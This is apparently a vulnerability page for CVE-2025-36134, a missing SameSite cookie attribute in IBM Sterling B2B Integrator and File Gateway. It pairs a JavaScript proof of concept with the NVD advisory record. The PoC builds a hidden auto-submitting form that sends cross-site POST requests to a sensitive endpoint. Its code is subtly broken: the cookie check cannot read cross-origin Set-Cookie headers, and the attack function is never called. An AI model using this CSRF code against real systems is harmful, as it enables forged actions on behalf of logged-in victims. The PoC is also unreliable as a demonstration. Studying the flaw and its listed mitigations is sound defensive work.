CVE-2025-36134

// CVE-2025-36134 SameSite Cookie Missing PoC // This PoC demonstrates how an attacker could exploit the missing SameSite attribute const targetUrl = 'https://vulnerable-ibm-sterling-instance.com'; const attackerDomain = 'https://attacker-controlled-site.com'; // Check if SameSite attribute is missing or insecure async function checkCookieSecurity() { const response = await fetch(targetUrl, { credentials: 'include', mode: 'cors' }); const cookies = response.headers.getSetCookie(); console.log('Cookies received from target:'); cookies.forEach(cookie => { console.log(cookie); // Check if SameSite attribute is present if (!cookie.toLowerCase().includes('samesite')) { console.log('[VULNERABLE] SameSite attribute is missing!'); } else if (cookie.toLowerCase().includes('samesite=none')) { console.log('[WARNING] SameSite=None requires Secure attribute'); } }); } // Simulate CSRF attack via cross-site request function exploitMissingSameSite() { // Create an invisible form for CSRF attack const form = document.createElement('form'); form.action = targetUrl + '/api/sensitive-endpoint'; form.method = 'POST'; form.target = '_blank'; form.style.display = 'none'; const input = document.createElement('input'); input.type = 'hidden'; input.name = 'action'; input.value = 'exfiltrate_data'; form.appendChild(input); document.body.appendChild(form); form.submit(); console.log('[ATTACK] CSRF request sent via cross-site form submission'); } // Execute PoC checkCookieSecurity(); // Note: This PoC requires the victim to be logged into the target application // and visit the attacker's page while authenticated. /* Mitigation: 1. Set SameSite=Strict or SameSite=Lax for all sensitive cookies 2. If SameSite=None is required, ensure Secure attribute is also set 3. Implement CSRF tokens as additional protection 4. Apply security headers (Content-Security-Policy, X-Frame-Options) */

{"cve": {"id": "CVE-2025-36134", "sourceIdentifier": "[email protected]", "published": "2025-11-25T15:15:51.657", "lastModified": "2025-12-01T15:05:10.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.5 and 6.2.1.1 could disclose sensitive information due to a missing or insecure SameSite attribute for a sensitive cookie."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1275"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "AE818255-FEE2-453A-8230-81986F93954E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "5E7BD82C-7A6C-44C3-BE64-FFF75700EED1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C4ACC673-C9A9-4149-821E-5A60603141DD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0.0", "versionEndExcluding": "6.1.2.7_2", "matchCriteriaId": "2831DF62-E968-4B8F-A4DA-E0752F9B5D9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "6CF6DF92-A6D4-4FBB-8662-5BE9D814D911"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:6.2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "1B08AE6F-BE1D-4353-BD4A-259284624BCB"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252210", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}